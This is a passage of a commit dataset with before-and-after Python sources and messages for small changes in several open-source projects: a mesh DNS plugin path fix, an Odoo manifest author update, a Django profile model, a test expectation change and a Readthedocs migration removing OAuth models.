#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
Fix bad path for mesh-reverse.db
|
Fix bad path for mesh-reverse.db
|
Python
|
bsd-3-clause
|
heyaaron/openmesher,heyaaron/openmesher,darkpixel/openmesher,darkpixel/openmesher
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
Fix bad path for mesh-reverse.db
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
<commit_before>import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
<commit_msg>Fix bad path for mesh-reverse.db<commit_after>
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
Fix bad path for mesh-reverse.dbimport logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
<commit_before>import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
<commit_msg>Fix bad path for mesh-reverse.db<commit_after>import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
fb03522237afdd56059fb0146e1609b85606286f
|
l10n_ch_import_cresus/__openerp__.py
|
l10n_ch_import_cresus/__openerp__.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
Add Odoo Community Association (OCA) as author
|
Add Odoo Community Association (OCA) as author
|
Python
|
agpl-3.0
|
open-net-sarl/l10n-switzerland,BT-ojossen/l10n-switzerland,cgaspoz/l10n-switzerland,CompassionCH/l10n-switzerland,BT-fgarbely/l10n-switzerland,BT-csanchez/l10n-switzerland,cyp-opennet/ons_cyp_github,BT-fgarbely/l10n-switzerland,ndtran/l10n-switzerland,CompassionCH/l10n-switzerland,cyp-opennet/ons_cyp_github,open-net-sarl/l10n-switzerland,BT-aestebanez/l10n-switzerland,michl/l10n-switzerland,BT-ojossen/l10n-switzerland
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
Add Odoo Community Association (OCA) as author
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
<commit_before># -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
<commit_msg>Add Odoo Community Association (OCA) as author<commit_after>
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
Add Odoo Community Association (OCA) as author# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
<commit_before># -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
<commit_msg>Add Odoo Community Association (OCA) as author<commit_after># -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Account Import Cresus',
'version': '1.0',
'depends': [
'account',
],
'author': 'Camptocamp, Odoo Community Association (OCA)',
'website': 'http://www.camptocamp.com',
'data': [
'wizard/l10n_ch_import_cresus_view.xml',
'account_tax_view.xml',
'menu.xml',
],
'installable': True,
}
|
53ff13fa0822dbabf554360bf000f8b3bfe41f40
|
imagersite/imager_profile/models.py
|
imagersite/imager_profile/models.py
|
from django.db import models
# Create your models here.
|
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
Set up basic imagerprofile and made first migration
|
Set up basic imagerprofile and made first migration
|
Python
|
mpl-2.0
|
WillWeatherford/django-imager,WillWeatherford/django-imager
|
from django.db import models
# Create your models here.
Set up basic imagerprofile and made first migration
|
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
<commit_before>from django.db import models
# Create your models here.
<commit_msg>Set up basic imagerprofile and made first migration<commit_after>
|
"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
from django.db import models
# Create your models here.
Set up basic imagerprofile and made first migration"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
<commit_before>from django.db import models
# Create your models here.
<commit_msg>Set up basic imagerprofile and made first migration<commit_after>"""Establish models for the imager site's User Profile."""
from django.db import models
from django.contrib.auth.models import User
class ImagerProfile(models.Model):
"""Profile attached to User models by one-to-one relationship."""
user = models.OneToOneField(User, related_name='profile')
is_active = models.BooleanField(default=False)
location = models.CharField(default='')
camera = models.CharField(default='')
fav_photo = models.CharField(default='')
|
48d0dc98fd859ea1d8cf25370fe0be9ac1350448
|
selftest/subdir/proc.py
|
selftest/subdir/proc.py
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
Mark broken pipe test with expected failure
|
Mark broken pipe test with expected failure
|
Python
|
bsd-2-clause
|
depp/idiotest,depp/idiotest
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
Mark broken pipe test with expected failure
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
<commit_before># Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
<commit_msg>Mark broken pipe test with expected failure<commit_after>
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
Mark broken pipe test with expected failure# Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
<commit_before># Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
<commit_msg>Mark broken pipe test with expected failure<commit_after># Copyright 2012 Dietrich Epp <depp@zdome.net>
# See LICENSE.txt for details.
@test(fail=True)
def nostdin_1():
check_output(['./nostdin'], 'Test', '')
fail("The pipe didn't break, but that's okay")
@test(fail=True)
def nostdin_2_fail():
check_output(['./nostdin'], 'Test', 'Bogus')
@test
def nostdout_1():
check_output(['./nostdout'], 'Test', '')
@test(fail=True)
def nostdout_2_fail():
check_output(['./nostdout'], 'Test', 'Bogus')
|
39708edfad5698b34771eba941ac822cbf84baa7
|
readthedocs/oauth/migrations/0004_drop_github_and_bitbucket_models.py
|
readthedocs/oauth/migrations/0004_drop_github_and_bitbucket_models.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
Drop content type in migration as well
|
Drop content type in migration as well
|
Python
|
mit
|
stevepiercy/readthedocs.org,techtonik/readthedocs.org,pombredanne/readthedocs.org,rtfd/readthedocs.org,stevepiercy/readthedocs.org,istresearch/readthedocs.org,techtonik/readthedocs.org,pombredanne/readthedocs.org,tddv/readthedocs.org,espdev/readthedocs.org,istresearch/readthedocs.org,rtfd/readthedocs.org,davidfischer/readthedocs.org,safwanrahman/readthedocs.org,davidfischer/readthedocs.org,davidfischer/readthedocs.org,davidfischer/readthedocs.org,espdev/readthedocs.org,stevepiercy/readthedocs.org,espdev/readthedocs.org,espdev/readthedocs.org,tddv/readthedocs.org,istresearch/readthedocs.org,safwanrahman/readthedocs.org,espdev/readthedocs.org,safwanrahman/readthedocs.org,safwanrahman/readthedocs.org,tddv/readthedocs.org,rtfd/readthedocs.org,istresearch/readthedocs.org,rtfd/readthedocs.org,stevepiercy/readthedocs.org,techtonik/readthedocs.org,pombredanne/readthedocs.org,techtonik/readthedocs.org
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
Drop content type in migration as well
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
<commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
<commit_msg>Drop content type in migration as well<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
